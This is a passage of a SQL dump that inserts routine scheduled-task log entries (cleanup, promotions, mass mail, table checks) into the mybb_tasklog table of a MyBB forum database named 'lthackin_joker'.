mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15490', '5', '1352408012', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15491', '9', '1352408185', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15492', '3', '1352408426', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15493', '1', '1352408433', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15494', '7', '1352408438', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15495', '5', '1352408722', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15496', '9', '1352409522', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15497', '5', '1352410488', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15498', '9', '1352410994', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15499', '3', '1352411007', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15500', '5', '1352411464', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15501', '9', '1352412193', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15502', '3', '1352412214', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15503', '1', '1352412242', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15504', '7', '1352412244', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15505', '5', '1352412695', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15506', '9', '1352412724', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15507', '5', '1352413589', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15508', '9', '1352413608', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15509', '3', '1352413851', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15510', '9', '1352414430', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15511', '5', '1352414719', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15512', '9', '1352418570', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15513', '3', '1352418584', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15514', '1', '1352418598', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15515', '7', '1352418602', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15516', '5', '1352418606', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15517', '9', '1352420172', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15518', '3', '1352422036', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15519', '1', '1352422042', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15520', '2', '1352422891', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15521', '7', '1352422897', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15522', '11', '1352422920', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15523', '5', '1352422954', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15524', '9', '1352422980', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15525', '3', '1352422980', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15526', '1', '1352422985', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15527', '5', '1352424477', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15528', '9', '1352424964', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15529', '3', '1352425157', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15530', '9', '1352426442', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15531', '5', '1352426498', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15532', '3', '1352426585', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15533', '1', '1352426949', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15534', '7', '1352426970', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15535', '5', '1352426985', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15536', '9', '1352427119', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15537', '5', '1352427960', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15538', '9', '1352427969', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15539', '3', '1352428814', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15540', '9', '1352428961', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15541', '5', '1352430521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15542', '9', '1352430718', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15543', '3', '1352430818', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15544', '1', '1352430830', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15545', '7', '1352430847', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15546', '5', '1352431533', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15547', '9', '1352431562', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15548', '3', '1352431805', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15549', '9', '1352432522', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15550', '5', '1352432997', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15551', '9', '1352434109', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15552', '3', '1352434177', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15553', '1', '1352435729', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15554', '7', '1352435735', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15555', '5', '1352436106', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15556', '9', '1352436120', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15557', '3', '1352436133', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15558', '5', '1352436427', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15559', '9', '1352437093', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15560', '3', '1352437152', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15561', '1', '1352437259', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15562', '7', '1352437542', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15563', '5', '1352437606', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15564', '9', '1352440784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15565', '5', '1352440791', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15566', '3', '1352440852', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15567', '1', '1352440960', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15568', '7', '1352441027', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15569', '5', '1352441116', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15570', '9', '1352441504', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15571', '5', '1352442873', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15572', '9', '1352443158', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15573', '3', '1352443167', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15574', '9', '1352443222', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15575', '5', '1352443504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15576', '9', '1352445837', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15577', '3', '1352448964', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15578', '1', '1352449196', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15579', '7', '1352449226', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15580', '5', '1352449244', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15581', '9', '1352449443', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15582', '5', '1352449520', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15583', '9', '1352449567', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15584', '3', '1352449927', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15585', '9', '1352450626', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15586', '5', '1352450780', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15587', '9', '1352451392', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15588', '3', '1352451669', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15589', '1', '1352451678', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15590', '7', '1352451684', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15591', '5', '1352452157', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15592', '9', '1352452337', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15593', '5', '1352454391', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15594', '9', '1352454941', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15595', '3', '1352454942', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15596', '3', '1352463842', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15597', '1', '1352464405', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15598', '7', '1352464416', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_datacache, lthackin_joker.mybb_forums, lthackin_joker.mybb_sessions, lthackin_joker.mybb_threads, lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history, lthackin_joker.mybb_users table(s).'); INSERT INTO mybb_tasklog VALUES('15599', '5', '1352464424', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15600', '9', '1352464426', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15601', '3', '1352464569', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15602', '9', '1352468366', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15603', '5', '1352468486', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15604', '3', '1352468494', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15605', '1', '1352468521', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15606', '7', '1352468548', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15607', '9', '1352468657', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15608', '5', '1352469101', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15609', '9', '1352469319', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15610', '3', '1352470013', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15611', '1', '1352470037', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15612', '7', '1352470043', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15613', '5', '1352470056', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15614', '9', '1352470484', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15615', '5', '1352471442', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15616', '9', '1352471646', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15617', '3', '1352472099', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15618', '9', '1352472138', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15619', '5', '1352472960', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15620', '9', '1352473040', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15621', '3', '1352474248', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15622', '1', '1352474251', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15623', '7', '1352474263', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15624', '5', '1352474266', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15625', '9', '1352474736', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15626', '5', '1352474843', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15627', '3', '1352475133', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15628', '9', '1352475689', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15629', '5', '1352476804', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15630', '9', '1352476853', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15631', '3', '1352476858', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15632', '1', '1352476979', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15633', '7', '1352477018', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15634', '5', '1352478016', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15635', '9', '1352478095', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15636', '5', '1352478363', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15637', '9', '1352478376', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15638', '3', '1352478980', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15639', '9', '1352479272', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15640', '5', '1352480047', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15641', '9', '1352482878', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15642', '3', '1352482883', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15643', '1', '1352482887', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15644', '7', '1352482912', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15645', '5', '1352482997', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15646', '5', '1352484163', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15647', '9', '1352484644', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15648', '3', '1352485928', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15649', '1', '1352485944', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15650', '7', '1352485947', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15651', '5', '1352486173', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15652', '9', '1352486181', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15653', '9', '1352486427', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15654', '5', '1352488186', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15655', '9', '1352488891', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15656', '3', '1352488898', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15657', '1', '1352488909', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15658', '7', '1352488914', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15659', '5', '1352489707', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15660', '9', '1352489768', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15661', '3', '1352489783', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15662', '9', '1352490483', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15663', '5', '1352490515', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15664', '9', '1352491075', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15665', '3', '1352491150', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15666', '1', '1352491302', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15667', '7', '1352491325', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15668', '5', '1352491530', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15669', '9', '1352491872', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15670', '5', '1352492765', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15671', '9', '1352492769', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15672', '3', '1352493091', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15673', '9', '1352493669', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15674', '5', '1352493916', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15675', '9', '1352495564', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15676', '3', '1352495660', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15677', '1', '1352495678', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15678', '7', '1352495681', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15679', '5', '1352495687', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15680', '5', '1352496304', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15681', '9', '1352496324', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15682', '3', '1352496648', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15683', '9', '1352497479', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15684', '5', '1352497535', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15685', '9', '1352500094', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15686', '3', '1352500417', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15687', '1', '1352501040', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15688', '7', '1352501041', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15689', '5', '1352501416', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15690', '9', '1352501836', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15691', '3', '1352502897', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15692', '1', '1352502903', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15693', '7', '1352502969', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15694', '5', '1352502973', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15695', '9', '1352502986', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15696', '5', '1352503645', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15697', '9', '1352503679', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15698', '3', '1352503936', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15699', '9', '1352504891', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15700', '5', '1352505518', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15701', '9', '1352508303', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15702', '3', '1352508306', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15703', '1', '1352508310', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15704', '2', '1352508323', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15705', '7', '1352508332', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15706', '11', '1352508335', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15707', '5', '1352508376', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15708', '9', '1352509637', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15709', '3', '1352509655', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15710', '1', '1352510620', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15711', '7', '1352510626', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15712', '5', '1352511150', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15713', '9', '1352511162', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15714', '3', '1352511168', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15715', '9', '1352511911', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15716', '5', '1352512818', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15717', '9', '1352515345', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15718', '3', '1352515365', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15719', '1', '1352515379', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15720', '7', '1352515385', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15721', '5', '1352515389', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15722', '5', '1352515545', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15723', '9', '1352516699', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15724', '3', '1352516718', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15725', '1', '1352516954', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15726', '7', '1352516956', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15727', '5', '1352516971', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15728', '9', '1352517035', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15729', '5', '1352517904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15730', '9', '1352517934', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15731', '3', '1352518278', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15732', '9', '1352519052', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15733', '5', '1352519133', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15734', '9', '1352519829', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15735', '3', '1352519988', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15736', '1', '1352520209', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15737', '7', '1352520284', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15738', '5', '1352520371', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15739', '9', '1352520707', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15740', '5', '1352521500', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15741', '9', '1352521513', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15742', '3', '1352521819', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15743', '9', '1352522818', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15744', '5', '1352522823', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15745', '9', '1352523365', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15746', '3', '1352524510', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15747', '1', '1352524614', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15748', '7', '1352524642', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15749', '5', '1352524649', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15750', '9', '1352524742', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15751', '5', '1352525145', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15752', '9', '1352525261', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15753', '3', '1352525463', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15754', '9', '1352526036', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15755', '5', '1352526305', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15756', '9', '1352526951', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15757', '3', '1352527151', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15758', '1', '1352527213', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15759', '7', '1352527232', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15760', '5', '1352527657', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15761', '9', '1352527915', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15762', '5', '1352528741', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15763', '9', '1352528838', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15764', '3', '1352529084', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15765', '9', '1352529659', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15766', '5', '1352529913', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15767', '9', '1352530594', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15768', '3', '1352530797', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15769', '1', '1352530825', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15770', '7', '1352530880', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15771', '5', '1352531307', 'The 